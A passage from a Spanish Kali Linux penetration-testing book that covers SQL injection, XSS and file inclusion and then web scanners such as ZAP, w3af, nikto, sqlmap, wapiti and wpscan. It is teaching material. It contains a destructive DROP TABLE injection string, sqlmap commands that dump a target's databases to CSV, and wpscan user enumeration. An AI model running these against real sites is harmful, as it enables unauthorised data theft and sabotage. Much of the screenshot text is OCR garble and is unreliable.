no mutuamente excluyentes: el primero, identificar software instalado "Wordpress, 
Drupal...- y si no está actualizado, aplicar las vulnerabilidades conocidas. El 
segundo, conocidas determinadas vulnerabilidades -principalmente, la inyección 
de SQL y el XSS-, intentar identificar si en algun momento el sitio web es 
vulnerable. 


El primer enfoque es el más barato -para nosotros, y para el cliente-, y 
la mayor parte de los presupuestos se van a quedar ahí. El segundo enfoque es 
exhaustivo, pero supone reauditar mucho código, especialmente en paquetes ya 
desarrollados; y en determinados paquetes encontrar ya una vulnerabilidad de este 
tipo no es trivial. 


En este libro nos vamos a centrar por razones de tiempo en el primer enfoque. 
Además, porque es el que normalmente nos contratarán por razones de precio. Sin 
embargo, primero explicaremos cómo funcionan las inyecciones de código y el XSS. 


1.1 INYECCIÓN SQL 

Una inyección de SQL consiste en aprovechar un error comün de 
programación: se "monta" el SQL concatenando una variable sin asegurarnos que 
la variable contiene lo que esperamos. Se entiende mejor con un ejemplo clásico. 
Supongamos que tenemos la línea de código: 


$sql="SELECT . FROM usuarios WHERE nombre = '".$usuario."';" 
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Y que no hemos verificado que la variable $usuario contenga un usuario 
válido. Supongamos que $usuario se lee directamente de un formulario HTML. 
Nada evita que en el formulario tecleemos la cadena: 


medaigual’; DROP TABLE usuarios; 


Cuando se ejecute la sentencia indicada, lo que realmente estaremos 
asignando a la variable $sql es: 


SELECT , FROM usuarios WHERE nombre = 'medaigual'; DROP TABLE usuarios; 


En cuyo caso, estaremos eliminando la tabla de usuarios entera, y saboteando 
el sistema en remoto. Aqui la creatividad no tiene limites: se pueden anadir usuarios 
con privilegios inyectando un INSERT; se pueden borrar usuarios específicos, añadir 
facturas, identificar información del modelo de datos de la base de datos, forzar al 
propio servidor web a actuar como pasarela y atacar otra base de datos distinta... se 
pueden hacer muchas cosas. 


Esimportante que entendamos que los casos no sontan sencillos habitualmente 
en código de software libre asentado -tipo Wordpress, Drupal...-. Este error se suele 
dar en plugins mal programados, y en código propio que se hace deprisa y corriendo 
en PHP de cualquier forma para resolver un problema puntual, y que se "queda 
ahí". Por ello, los exploits por inyección SQL los buscaremos sobre todo en código 
desarrollado por la propia empresa, por gente de sistemas, en servidores internos. Y 
no se buscará tanto la posibilidad de sabotaje, ya que con frecuencia es cierto que 
se conecta a una base de datos intrascendente, sino intentar inyectar SQL que nos 
permita acceder a otra base de datos almacenada en el mismo servidor, y que si que 
puede que tenga interés estratégico. En este tipo de código merecerá la pena, por 
lo tanto, al menos probar si el ataque vía inyección SOL es factible, aunque no se 
pretenda analizar código, sino solo verificar de forma experimental si es trivialmente 
explotable. 


En código en producción es complicado encontrar este tipo de inyecciones 
simples; ya que con frecuencia se filtran determinados caracteres sensibles; como 
«gr, E, 2, 0%”, “HP”, Lo 4, por poner algunos ejemplos. Sin embargo, para ser 
estrictos habría que buscar vía expresiones regulares y escapar o eliminar todo lo 
que no proceda cada vez que se "monte" una sentencia SQL; lo que no se suele 
hacer. Por ello, la auditoría pasa con frecuencia por rastrear a partir del código fuente 
las variables que se utilizan en un punto hacia atrás, buscando a ver si hay alguna 
forma no trivial de inyectar SQL. Esta es la mecánica que se utiliza para auditar 
aplicaciones como Wordpress o Drupal, por poner ejemplos. 
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La inyección SQL no se hace solo a través de los formularios. Se puede 
hacer -y se hace- a través de cualquier parámetro que se pase por GET o por POST. 
También se puede hacer a través de las cookies. Cualquier cosa que el código que 
se ejecuta en el servidor concatene con cadenas para montar sentencias SOL es 
potencialmente explotable para hacer inyección SQL. 


XSS -Coss-Site Scripting- es una vulnerabilidad por la cual se inserta 
código de script -habitualmente JavaScript- en páginas web remotas, para conseguir 
robar información. A diferencia de la inyección SQL, el XSS es conceptualmente 
complicado; ya que requiere conocer bien programación web y JavaScript para 
poderlo utilizar de forma eficiente. 


El concepto detrás del XSS es que la política de seguridad habitual es que 
el servidor confía por defecto en el contenido del propio servidor. Por ello, si se 
puede forzar al servidor a ejecutar código no propio creyendo que es propio, se 
puede utilizar el ataque, entre otras cosas, para extraer información. El código 
inyectado, de hecho, puede permitirnos mostrar información y alterar información 
que tenemos privilegio para ver y alterar, y que no podemos ver o alterar porque 
el interfaz no nos lo permite. También podemos mediante técnicas de ingeniería 
social hacer que otro usuario abra una ventana del navegador con la aplicación y 
la vulnerabilidad XSS explotada, permitiéndonos que desde su navegador, su IP 
y su nivel de privilegios se hagan cosas que su interfaz no soporta -aunque tenga 
privilegios para hacerlas-, y que nosotros seguro que no tenemos privilegios 
para hacerlo. Los XSS son ütiles para que teniendo cuenta válida en el sistema, 
podamos obtener un listado de usuarios de la base de datos. O para obtener 
volcados completos de tablas. O para que el sistema nos mande a una dirección 
de correos privada en otra jurisdicción un correo electrónico con un volcado de 
información cuando abra una página web determinada. Todo lo que podamos 
programar en JavaScript, lo podremos aprovechar en XSS. 


XSS hace uso de tags que pueden ejecutar código. Son el caso de script, o 
iframe. También se pueden emplear atributos que permitan ejecutar código; como 
behavior de STYLE de FK. DIV da mucho juego para el XSS; especialmente 
porque a través de background-image: de un DIV podemos lanzar un algo como 
url(javascript:eval(código)). 


160 KALI LINUX © RA-MA 


Finalmente AJAX permite introducir objetos XMLHttp a través de 
vulnerabilidades XSS, que permiten enviar contenido POST o GET. 


Los XSS se pueden descubrir mediante el uso de proxys inversos, si se trata 
de código HTML o JavaScript empotrado. 


No entraremos en detalle en los XSS, aunque es una línea que recomiendo 
para continuar aprendiendo después de la lectura de este libro. 


1.3 INCLUSIÓN DE ARCHIVOS LOCALES 


La inclusión de archivos locales se hace explotando que una aplicación 
maneje ficheros a través de parámetros sin filtrar. La operativa es análoga a la de 
la inyección SQL; pero en lugar de realizarla sobre parámetros que se utilizarán 
para montar un SQL, se utiliza sobre parámetros que se emplearán para acceder a 
archivos. Esto se utiliza para acceder a archivos locales; lo que a su vez se utiliza 
para acceder en texto plano a archivos sensibles, como el archivo de configuración 
dónde está el usuario y la clave de la base de datos de la aplicación web, por poner 
un ejemplo. 


Como en el caso de la inyección SQL, se puede hacer a través de cualquier 
parámetro que se pase por GET o por POST, formularios incluídos, así como a través 
de las cookies. 


Existen otras técnicas parecidas; la Path Transversal, que empleamos un 
truco distinto para extraer los ficheros, y la inclusión de ficheros remotos. 


7.4 OWASP ZED ATTACK PROXY 


OWASP Zed Attack Proxy es una herramienta de auditoria de sitios web 
bastante popular. Mediante un interfaz bastante cómodo y amigable, podemos 
detectar las vulnerabilidades más comunes. Además de escaners pasivos y activos, 
entre otras funciones dispone de proxy inverso y fuzzing -alimentar a la aplicación 
web con datos extranos, y ver cómo se comporta-. 


Es una aplicación muy fácil de usar, que podemos lanzar desde el propio 
interfaz. Lo primero que debemos hacer es lanzar la aplicación en el desplegable 
de arriba a la izquierda del interfaz de Kali, y tendremos la primera pantalla de 
arranque: 
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Sesión sin Nombre - OWASP ZAP 2.6.0 
ghae Eonar Yer мем, Beporte Herramientas не E 








¡Bienvenido al OWASP Zed Attack Proxy (ZA 


a Default Context ZAP es una herramienta para pruebas de penetración, de facil uso y can múltiples campone 
Sitias 


Ten en cuenta que sólo debes atacar aplicaciones para las cuales se ha sido previamente г 


`| Para probar una aplicación rápidamente, introdueca la URL y presione ‘Atacar’. 





URL à atacan https à 


| 4f Macar | Ш Detener 


Progreso: No iniciado 








опа | S Buscar PY alertas 12 Salida + 
o ө ¥ Filtro APAGADO 
|10 (Req. Timestamp | mét.. | URL = [Cen | Reason |R.. |512 Аезр... |HighestA..|N.. | Tag 








“Alertas fO RO RORO Escaneo actual @ 0 Y 





En "URL a atacar" de "Inicio rápido" tecleamos la dirección web cuya 
seguridad queremos verificar, y pulsamos el botón de “Atacar”: 


Seno. Star. Jer агам Repote Herramientas Online Ayuda 








_ Bienvenido al OWASP Zed Attack Proxy (ZAP) 
ТАР es una herramienta para pruebas de penetración, de facil uso y con multiples componentes. p. 
Ten en cuenta que sólo debes atacar aplcaciones para las cuales se ha sido previamente autoriza: 
Para probar una aplicación rápidamente, introduzca la URL y presone ‘Atacar, 


URL à atacar: . httpilwww,orcaro.org 
F racer Ш Detener 
Progreso; Enplorarido (atacando) activamente las URLs descubiertos por el “spider” 


Para un análisis más en profundidad de la prueba se debe explorar la aplicación mediante pruebas; | 








Si usted está usando Firefox 24.0 о superior puede usar "Plag-n-Hack' para configurar su navegado? 





38 19/04/16 18:49... T httpi//www.otcero.0rg/85075083031 7866... 345 bytes 
38 19/04/16 18:49... 4... hitpi/www.orcero.org'daniel/991 7442340... w 42,51 KiB 
39 19/04/16 18:49... 4%... http://www. orcero.orgdanic/303840B384... - 42,51 ЮВ 
4] 19/04/16 18:49... 4... hitpi//wew.orcero.orgTran/49945479797... e. T. 345 bytes: 
43 15/04/16 18:49... 4%... http://www. orcero.orgirbis/28441069723... 345 bytes 
45 19/04/16 18:49... '4э:. httpr//www.orcero.orgt 29 1,99 08 
48 19/04/16 18:49... 4%... http://www.otcero.org'robots.t«t/ - 490 bytes 
47 19/04/1010:49... ;4э.. hittp:ffwww.or cero. огой ermap xmi 345 bytes 




















Pulsado el botón, comenzará a actuar como un web crawler, a descargar 
páginas y a ir buscando potenciales problemas de seguridad. En cualquier 
momento podemos seleccionar la lengüeta inferior "Alertas", y tendremos todas las 
vulnerabilidades encontradas, organizadas por severidad y por tipo de vulnerabilidad: 
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| 2 нехопа | ©, Buscar [Maltas] | Salida | 4 spidertaraña) | Э Escaneo acto | + | 


Aqui se mostrara el detalle completo de cualquier alerta seleccionada. 








v @ Alertas (3) 


* BP X-Frame-Options Header Not Sat (13) Puede añadir alertas de forma manual haciendo clic con el botón derecho sobre cualquier entr 
* @ fo Web Browser X55 Protection Not Enabled (13) ada en el historial y seleccionando "Anadir alerta". 


* lli FX-Contant Typa-Options Header Missing (13) 


Y También puede editar las alertas existentes haciendo doble clic sobre ellas. 








LA — - - — 
Alertas MO R1 i22 RO Escaneo actual 





Si pulsamos en una vulnerabilidad concreta, obtendremos dónde está 
exactamente la vunerabilidad; así como una descripción de la vulnerabilidad, la 
gravedad de esta, y la probabilidad de que sea explotada: 

















GET: http://vww.orcero. org/manual/ | d http://www. orcero.orgi 
| GET: http://vww.orcero.orgírobots.t«t (Ri Plow 
[$ GET: http: /fwww.orcero. orafsrremap.»ml Medium 
v [gj f" Web Browser X35 Frotection Not Enabled (13) etro: 
| GET: http://www.orcera.org 





[У GET: http://www.ercera.orafaddan-madules/ 
ГУ GET: http:/fwww.orcero. org/admini 
У GET: http:Sfwww.orcero.org/all eur e-mail addres: 


[^ GET: http:f/mww.orcero.org/doc/ ||| Web Browser XSS Protection is not enabled, or is disabled by the configuration of the 
SS AAA ASS Protection’ HTTP response header on the web server 

















Además, seleccionando la vulnerabilidad en concreto, podemos ver el código 
Web que produce la susodicha vulnerabilidad: 
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(eto енеда I 2 iHe re 0569 non Onm é. :өр»роҳаътш c 
4 Inicio Rápido | = Patigón 7 —f3 


| Header: Vista Raw rier |Cuerpe Vista Raw aj С a 
|" C contests WITP/1.1 206 OK 
[ Default Context X-Powered-By: PHP/S.4.45-Gtdeb7u2 
> @ P Sitios Content-type: text/htel 
Date: Wed, 27 Apr 2016 18:00:37 GMT 
Server: lighttpd/1. 4,31 

















</style> 
<link rel='stylesheet’ :d-'fb data style-css' href= 
"http://www. ingenierosninfornatica .pro/blog/wp- content /plugins/feadburner - forn/control/fb Я 


| |style.css?vera-4.3.3' type='text/cas' nedia-'all' /> 
<link rel-'stylesheet' 1d-'page-list-style-css' href= 
"http://www. ingenieroeninformatica, тый content /plugins/sitemap/css/page-list.css? 
ver=4.3' type= 'rert/css' media-'all' / 
meta nane-" generator" contar герге 4, 3 3-  really- -static 0.5" /» 
«script charset="utf-8" typa-'tezt/javascri. ю: </scrip ME i 
chareete*utf-8" kxpe-"text/]avascript* sree’ irethis.com/outt 


[se storia [E buscar [Palena] > satas | WF spicertarara) | 3 Escaneo actio | + | 
0% 


M - Alertas (4) R htlpufwww,ingenieraeninformatica.pro/blog/ 
P XFrame-Options Header Not Set (477) { F Low 

Medium 

* GBM Web Browser X55 Protection Not Enabled (477) j Һр: sharethis.com/button/buttons. js 

> (BP Content-Type Options Header Missing (477) EAN ORUM 











пир: sharethis.com/butten/huttans.]s 
D 





Alertas R0 Rl ЁЗ BO 
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Si pulsamos dos veces encima de una vulnerabilidad obtenemos una 
descripción detallada de la vulnerabilidad, la documentación de cómo se ataca, y una 
propuesta de cómo se puede solucionar el problema. Toda esta información será crítica, 
ya que nos va a permitir redactar un buen informe de auditoría con gran facilidad: 


Archivo Editar Ver Analizar Reporte Het _ Editar Alerta 


As anas A TEMA Source source ple дымо ы А o 


| htte:ijwww.ingenieroeninte Uw, ingenieraeninformatica. profolog/ 


= Riesgo: (w lg 
+ © contexts | ——— 
EE Default Context Confidence: (Meum 


> @ Astos | ; lw. 7 buttons. Б 32Ь27гС%22диәп11ту%22%ЗА1%2С% 
$ Parámetro; http://w. sharethis.com/buttorvbuttons.|s fev 18:08:50 ӨМГ: path-/ 
Ataque: 


Evidencia: пира. sharethis. com/button/buttons.|s 4 
CWE ID: ol 
WASC ID: o Ө 


ca hrate 
Descripción: p="buttonBooksark* null 
The page at the following URL includes one or more script 


files тет a third-party domain rect red 20.png' /></am<script typs- 
t .com/j$/pinit, js"></script></spana< 
wre-button” data-colore*blue* 
Otra info: ге poiar ii classe 
A х=] redin 8° type= 
oe _ = 
X ш Cross-Demain JavaScript Source FL 
SET; http:f/tianda| esit. 
[5 GET: httpi//tiend: siil Ensure JavaScript source files are loaded from arly trusted 
[$ GET: http:/tiand esti | sources, and the sources can't be controlled by end users 
L GET: http:/itienda езі || ofthe application 
ET: } T | 
[^^ GET: http:/ftienda Ёш Referencia: 
"| GET: http:/fienda sli IL bre script files from a third-party demain 
[$ GET: http:/Mienda esti i — 
L3 GET: httpi/tiend: ег 














"https: //api.w.era/* 
ortlink 


























Solución: 
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Vemos el resultado de la auditoría de seguridad a una tienda Woo-commerce 
—realizado con el permiso del propietario de la tienda y del administrador de sistemas-: 


Archivo Editar Yer Analear Beporte Herramientas Online Ayuda 
Modoestánder iw) [LH Ш iwi 1 @ OSG Teo Ооп а; Ө»»оҗ шыш v 


Ў Inicio Rápido | =è Petición | [+ | 
Header Vista Raw "| Cuerpo:Vista Raw i" ¿Sa 


| НТТРЛ1.1 382 Found 
afault Со! X-Powered-By : РНР/5. 4.45- leb7u2 
[$] Default Content d- D«deb 
> @ "sitios | Бесе ht! 
| okie: 
| Set-Cookie: woo 











ed7cecaca72stebeesede re > AL 7 O 
| 7C5c dod n5 080470794. 8:08:27 GMT; pathe/ 
Content-type: text/ht 

















ШИ 

Medium 
Parámetro: woocommerce itams in cartel: path=/ 
Ataque: 
woocommerce items in cartel; path=/ 
0 


" yf ! Evd 
» (8 ® cross-Domain rm Source File Inclusion (334) OWE ID: 

» (B M Password Autocomplete in browser (2) WASC ID: 

» (li © Web Browser X55 Protection Not Enabled (655) Descripcióm 
» (i '" X-Content-Type-Optiens Header Missing (655) 


- PO vut E uie Y reper uy Hy) эө ner eens ылык Ee Beenie vul res 
accessed by JavaScript. If а malicious script can be run on this page then the cookie 
willbe accessible and can be transmitted to another site, If this is a session cookie 
then session hijacking may be passible. 
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Vemos otra alerta de la misma tienda: 


[Modo estándar іж) |) @ Bl в SGI п О): өьроҳаъш «© 
¿[2 men мрн | + rección manam + | 
(Header: vita Raw jy) [Cuerpo vita Raw 3) 


" S contents HTTF/1.1 200 ОК 
Œ Default Context X-Powered-By: PHP/5.4,45-D+deb7u2 
> @ Sitios Expires: Wed, 11 Jan 1984 05:00:00 GMT 
Cache-Control: no-cache, sust-revalidate, nax-age-ü 
Pragna: no-cache 
Content-Type: text/htel; 
es/snlrpe. php 


es/wp-json/»: rel="https: //api.w.org/* 





«<p cless="fors-row forn-row-wide'» 
«label *cr-"username'sNonbre de Usuario o correo electrónico <span 
equired">"</span></Label> 
<input type="text* class="input-text' nane="usernane" id-*usernane* 
values’ /» 
</p> 
«p class-"fors-row forn-row-wide"> 
«label for="password*>Contraseña «span ¢lass-"required*>*</span></ 











* @" X-Frame-Qptions Header Not Set (739) 
* BP Cookie set without HttpOnly flag (617) 
> GM cross. Domain JavaScript Source File Inclusion (415) 


» (gj f" Web Browser X55 Protection Not Enabled (744) 


* GP X-Content-Type-Options Header Missing (744) 
AUTOCOMPLETE attribute is not disabled in HTML FORM/INPUT element containing 


password type input. Passwords may be stored in browsers and retrieved, 








Aetas 0 #1 #5 #0 


On DOTA еььоҳшьш v 
[nico rápido | = ешп ['невршезга#= | + | 


MÀ Vista Raw [7| [Cuerpo vista. Raw =) eu 


" S Contents HTTF/1.1 200 OK 
[E] Default Context X-Powered-By: PHP/5.4. a5- O«deb702 
> @ A sitios ‘Content-Type: text/ht <LTF-8 
‘Link: «http: //tienda. .es/vp-json/>; rel-"https://api.w.org/" 
Date: Wed, 27 Apr 2016 18: а 
|Server: lighttpd/1.4.31 





></script> 
<link rel="sty 
| http: //t1ende. Jm -content/thenes/2 eri f 12 te/css/1e css" typee'text/ess"s 
(er [enti fj- -» 


<script typee*text/javascrip t'»docunent .docuventELewent „саза 
larcunst енин Ешй + puce jacet Кк S але 
| idos di squeda para 643220; 68221: 58211: Pagina 2 58211: 


ti 

















v (@ Alertas (7) 
v GR Directory Traversal (5 


.es/index.php/page/é 


esindex.php/my-ac The Path Traversal attack technique allows an attacker access to files, directones, 
* @P X-Frame-Options Header Not Set (750) and commands that potentially reside outside tha web document root directory. An 
» @# Cookie set without Httponly flag (721) attacker may manipulate a URL in such a way that the web site will execute or reveal 
- i Cross-Domein JavaScript Source File Inclusion (42 _the p contents of arbitrary files anvwhere on the web server, Алу device that exposes 








Alertas fi 1 5 RO 
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O el detalle de otra de riesgo alto: 


Sesion іо Аааа 20140410-1444127.- 4A ACLZALOA 2 


Archivo Editar Ver Analizar Reporte Herramientas O Editar Alerta 


Modo estándar іж) | ) i Bet iS 3 [Falla per Inyección SQL 
B Sitio netp:iend Э 70-2 2 
(High 

+ S contexts i [Media — — — — jy | 


LE Default Contest Р 
>» @ P Sitios ” 
98-2 























Descnpción: | 


Inyección SQL puede ser posible 


Otra info: 
pr wm 


wii pr шнш 








El valor de parámetro que está modificado fue NOT 
eliminado de la salida HTML para los fines dela 
comparación 








= historia | Buscar 








петтата шше ное | Solución: 
Ec 


No confe en los valores de entrada del lado del cliente, 
incluso si en el lado del cliente se realice una validación 


index. ph 
zi кру En general, comprobar todos los datos de entrado en el у 
а: 


+ R X-Frame-Options Header Not Set (750) sp oie 


* GP Cookie set without HttpOnly flag (721) https: //wew.owasp.org/index php/Top 10 2010-al 
* GP cross-Domain JavaScript Source File Inclusion + 


* BP Password Autocomplete in browser (2) | Cancelar | | Guardar | 
| > @ © Web Browser XSS Protection Not Enabled (755T—7T TEE 
X Ji 











En "Otra info" tenemos una explicación bastante amplia de cómo se ha 
validado la vulnerabilidad, y en "Solución" tenemos una explicación bastante 
detallada de cómo solucionar el problema. 


Realmente la mayor parte de las auditorías web las podemos realizar con 
esta herramienta. Funciona muy bien, y nos provee de muchísima información que 
nos permite redactar un buen informe justificado; ya que incluye aspectos como 
enlaces, e identificadores CWE y WASC que nos permiten identificar y referenciar 
exactamente la vulnerabilidad a la bibliografía existente. Si nos tenemos que quedar 
solo con una herramienta, será con esta. 


7.5 W3AF 


w3af es una herramienta enfocada a auditar y explotar las vulnerabilidades 
web. Es conceptualmente bastante parecida a ZAProxy. Decimos el sitio web - 
bloque derecho- y las vunerabilidades que queremos verificar —bloque izquierdo—: 
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w3af - Web Application Attack and Audit Framework 
Perfiles Editar Ver Herramientas Configuracion Ayuda 


нро» n (919 BH & D Q 4 


Configuracion del análisis (oq Resultedos Exploit 


Target http://target.example/ 
Active Plugin 
OWASP.TOP1O 
sudit..high.. risk 


5 Ы audit 
+ auth 


+ 


| full audit. spider. man 


web. infrastructure 


k This is an empty profile that you can use 
to start a new configuration from. 





Өо До ао 


Y nos da un informe de lo encontrado: 


w3af - tiend 
Perflles Edita Yer Herramientas Configuracion Ayuda 


нро au ш ЫЕ & оа 4 
| Configuracion del análisis Log Resultados Exploit 


KB Browser URLs Request/Response navigator 
—_ 
Y Vulnerability 7 Information 
Knowledge Base 


E whole target has no protection (X-Frame-Options header) against Click-Jacking attacks. This vulnerability was 
| «ск. јәс (1) found in the request with id 18. 





Summary Description 


Request Response 
Raw Headers 


| POST reco: t Lon NNNM MEA RAS CE ARS 
ЧЕР5%325%75Р%461%3 535%%75%46Р®З33%%46%45%311%иЕЕ24%цГ%4659%%46Е% 
32е%.%46%46%33%39А%%75Р%4! 


6%%75Р%46%33%34%%46Е2%35%%46%465%31%4%75%46%46% 
33%38%%75ЕР%34а%%75ЕЕ LY. 75Е%4620%%/5ЕР®3З41%%46Е2%33%%75Е%46%34%52%% 
75ЕЕ4®64%\%4БЕ4 ГАЯ%7Б5БЕЕ®31%30%иЕЕ2@%%75%46Е%35%33%%75ЕЕ59%шЕЕ®33%®33%%75Р%46% 
234%5С%.%46%46%3060%5С%%75%46%46%30е%0%6Ғ -1%32%%75Е®%46 -%®311%%75%46%46%30%55% 
SCWV7SFFOQS659$5C?u7J1J-dYUGv8b4 HTTP/1.1 
Content-length: 5 
Accept-encoding: gzip, deflate 
X-forwarded-for: 81.69.54.240 
Accept: */* 
User-agent: w3af.org 


Host: UC EN = 
Content-type: appilication/x-www-form-urlencoded 


ame 




















01 Al ао 
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A diferencia de ZAProxy, que es exclusivamente de auditoría, w3af trae un 
conjunto de exploits que podemos validar contra una vulnerabilidad encontrada: 


w3af - tiend RN 


Perfiles F Ver Herramientas Configuracion Ayuda 
яро ан 6 s8 § 0% -4 


Configuracion del análisis Log Resultados Exploit 
Exploits Vulnerabilities 
dav 

eval 

file_upload 

local. file reader 

o5 commanding 

rf 

sqlmap 

xpath 


The Proxies’ functionality 
will be implemented 
in the future. 


This plugin exploits eval() vulnerabilities and re 


This plugins has no options to configure 








He de confesar que realmente w3af no me gusta. Es más engorrosa de utilizar 
que ZAProxy, detecta menos vulnerabilidades, y las que detecta las documenta mal. 
La sensación con ZAProxy es que te hace todo el trabajo pedestre de una auditoría de 
seguridad de una aplicación web; mientras que w3af no deja de ser un scan y exploit 
con interfaz gráfico. Sin embargo, es bastante popular, por lo que la comentamos en 
este libro. 


1.6 NIKTO 


nikto -h servidor 


Donde servidor es el nombre del servidor que queremos analizar. 
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Por ejemplo, si queremos analizar el sistema www.peritoeninformatica.pr 
haremos: 


nikto -h www.peritoeninformatica.pro 


Obteniendo: 


der: PHP/5.4.45-@+deb7u2 
| ; header і not present. 


2r agent to protect again: 


to render the 


Lly sensitive information via ce 
lly sensitive information via cer 
y sensitive information via ce 


ly sensitive information via cer 





sqlmap es una aplicación que realiza tests de penetración en sistemas web 
vía inyecciones SOL. Los parámetros de uso son: 


Y -u URL: página web objetivo. 
Р -p: parámetro vulnerable. 
V -dbs: muestra el nombre de todas las bases de datos. 


Y -D: selecciona el nombre de la base de datos a la que queremos hacer las 
consultas. 


V -tables: muestra el nombre de las tablas en la base de datos seleccionada. 
V -T: muestra el nombre de la tabla en la que se realizarán las consultas. 


Y -columns: muestra el nombre de las columnas de la tabla seleccionada. 
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Y -dump: extrae los datos de la tabla seleccionada a un fichero CSV. 


Y -dbms: permite seleccionar el sistema gestor de bases de datos, si es 
conocido. 


Es una aplicación que, de usarla, no la vamos a usar en una unica ronda. Lo 
normal es utilizarla primero con la sintaxis: 


sqimap -u URL 
Donde URL es la URL que estamos analizando. 


En base a la informacion de sqlmap y de ZAProxy, el siguiente paso es ir 
tanteando pardmetros vulnerables con -p -o directamente utilizdndolos, si ZAProxy 
ya nos ha dado uno-: 


sqlmap -u URL -p parámetrovulnerable 
Una vez que damos con un parámetro vulnerable, hacemos: 
sqlmap -u URL -p parámetrovulnerable --dbs 


Para obtener todas las bases de datos que están en un sistema gestor de 
base de datos concreto. Ojo, a veces la autodetección de base de datos no va fina, 
y debemos especificar manualmente con -dbms el sistema gestor de base de datos 
sobre el que queremos consultar las bases de datos disponibles. 


Teniendo la base de datos, hacemos: 


sqlmap -u URL -p parámetrovulnerable -D basededatos -- 
tables 


Y obtendremos todas las tablas de esa base de datos. 


Seleccionamos la tabla que queremos, y obtenemos sus campos con: 


sqlmap -u URL -p parámetrovulnerable -D basededatos -- 
columns 


O si queremos un volcado del contenido de la tabla, almacenado en un 
fichero CSV, hacemos: 


ѕдітар -u URL -p parámetrovulnerable -D basededatos --dump 


Un ejemplo de la salida de sqlmap es: 
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rootWkali:-£ sqlmap -u 


{1.0.4.0i#dev} 


http: //sqlmap org 


ting at 19:29;* 


sqlmap got a 301 redirect to ‘http SA. Do you want to follow? [Y/n] у 


[1 57] [WARNING 


[1 [ NING aran id r 31 а ат 
[19:29:50] [WARNING] heuristic (basic) test shows that GET parameter ‘id' might not be injectable 





Wapiti es un potente escaner de vunerabilidades que identifica los siguientes 
errores: 


y XSS 

V Inyecciones de base de datos (Inyección SQL, XPATH y PHP, JSP y ASP) 
Y Inyección LDAP 

Y Errores en la gesión de ficheros —fopen, readfile, include— 

Y Detección de ejecución de comandos -eval, system, passtru- 

Y Inyección CRLF -fijación de sesión, HTTP RS- 


Wapiti puede ser sensiblemente lento en webs muy grandes, como instalaciones 
funcionales de Woocommerce. Pero айп así, es bastante interesante su uso. 


La forma básica de usarla es: 


wapiti dominio 
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Donde dominio es el dominio que queremos analizar. Por ejemplo, si hacemos: 


wapiti www.orcero.org 


Obtenemos: 








El informe generado se guarda en el directorio .wapiti/generated repo 
del $HOME del usuario que empleemos; en el caso del usuario empleado en este 
ejemplo -root- sería /root/.wapiti/generated report. Está en formato HTML, y se ve 
con un navegador. Por ejemplo el del caso anterior sería: 





Wapiti scan report - Iceweasel ооо 
Wapiti scan report x+ 
file:/J/root/.wapiti/generated. report/index.html ea па озу л ө = 
В Most Visited — О+еп‹һе Security Ҹ Kali Linux Kali Docs ‘Ñ Kali Tools  КЕхр!їсй-ОВ Aircrack-ng 
Wapiti vulnerability report for www.orcero.org 


Date of the scan: Thu, 21 2016 14:28:46 +0000. Sco of d K inner : tolde 





Summary 

Category Number of vulnerabilities found 
Fichero de backup 0 

Cross Ste Seriping a 

Inyección SQL a ciegas 0 

Bypass de Hlaccess a k 
Inyección SQL 0 

Fichero potencialmente peligroso 0 

Мал! е fich 0 

Ej de comandos ) 

CRLF Injection 0 


Error intemo del servidor 0 


Consurno de recursos 0 
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7.9 WPSCAN 


En principio, no podemos entrar aplicación a aplicación en lo que se emplea 
para cada posible sistema Web del mercado por restricciones de tiempo. Pero como 
el Wordpress es tan frecuente, haremos una excepción con este, y hablaremos del 
Wpscan. 


Wpscan es un escaner de plugins, temas y vulnerabilidades de ambos para 
Wordpress -por lo tanto, también de Woocommerce-, que es bastante potente y 
sencillo de usar. Su sintaxis básica es: 


wpscan --url dominio 


Donde dominio es el dominio que queremos analizar. Un ejemplo real de 
salida de wpscan es: 





© КА-МА 


Theme URI: http:/, 
Description: 


jr: Themelsle 
yr URI: h 


Enumerating plugins 
B plugins found: 


wp -content /plugi 
plugl 


s out of date, the 1 


EI 
up to date) 


wp -content/ 


wp -content/plug 


a-share-burrons v4.4.2 
ate) 


/plugins woocommer 


ugins/woocommerce 
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ion 
erce-integration 


readmo.txt 


ttons/ 


jittons/README . txt 


Como vemos, tenemos información de todos los plugins y temas instalados, 
de sus versiones y ubicación, así como de los que no están actualizados; lo que 
va a dar mucho juego para explotar las vulnerabilidades de aquellos que estén 
desactualizados. Podemos también obtener listados de algunos aspectos de 
instalaciones de Wordpress y de Woo-commerce, tales como el listado de usuarios 


dados de alta o de los plugins vulnerables, lo que haremos con: 


wpscan --url dominio --enumerate 


Obteniendo algo como: 


KALI LINUX 





1$ woscan 


PScar 


Sponsored by 5 


hac kar 


@_WPScan_, Gethical 


The WordPress 'htt 


' file exists 


р:/ tml 


sure (FPO http:// ^w des/rss- fur 


WordPress theme 


/fthemaisle.com/themes/z 


SUBEST 
31 


45-0+dəþb7u2 


fied from meta generator 


content /themes/ 
ontent/themes 
-content/t 


if-lite/ 


LITE is a free one çp "ordpres 


exp osina a v 


sian number 


3 PE 


5-25 


raž 











Enumerating 
Time: 06:01:24 = 
No plugins found 
Enumerating instal 
ime: 

No theme 


Enumerating timth 


No timthumb 


Enumerating 


Finished: Fr 
Requests Done: 


Memory used: 


with known vulner 


led nly 3S with known vulnerat 


mb files 


isernames 


190.809 Ti 
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Vemos un listado de los usuarios, que el sitio айп se usa el usuario 
administrativo admin, y un listado de temas desactualizados, plugins desactualizados 
y scripts TimThumb. 


1.10 OTRAS APLICACIONES 


Hay muchas más aplicaciones en las que no hemos entrado por las 
limitaciones de espacio del libro. Estas son: 


Y De base de datos: 


e bbsql 
e sglinja 
e sqlsus 
Y De identificación de CMS: 


e blindElephant 
e plecost 


Y De identificación de IDS: 


e ua-tester 


Y Indexadores web: 


e dirb 
e dirbbuster 
e webscarab 





8.1 CONCEPTOS PREVIOS 


El primer concepto clave es el de Exploit. Un exploit es un código que 
aprovecha un agujero de seguridad preexistente, con objeto de ejecutar una serie de 
órdenes para las que en teoría no se debería tener privilegio de ejecución en absoluto, 
0 sobre unos datos en concreto. 


A este código que se quiere ejecutar, y que no debería poder ejecutarse, se le 
denomina payload. El payload puede ser algo tan sencillo como un shell conectado a 
puerto, con objeto de poder ejecutar programas locales desde una máquina remota, o 
código que haga operaciones más complejas y específicas del sistema, como cambiar 
los parámetros de una máquina de control numérico para que las piezas conformadas 
salgan con errores pequenos, pero percibibles por el cliente. 


Es importante entender que poder ejecutar código desde un programa no 
supone necesariamente que la aplicación sea un programa. Por ejemplo, si hacemos 
un programa que ejecute código arbitrario como root, pero que requiera privilegios 
de root y lanzarse desde la consola de root... pues nos pongamos como nos pongamos, 
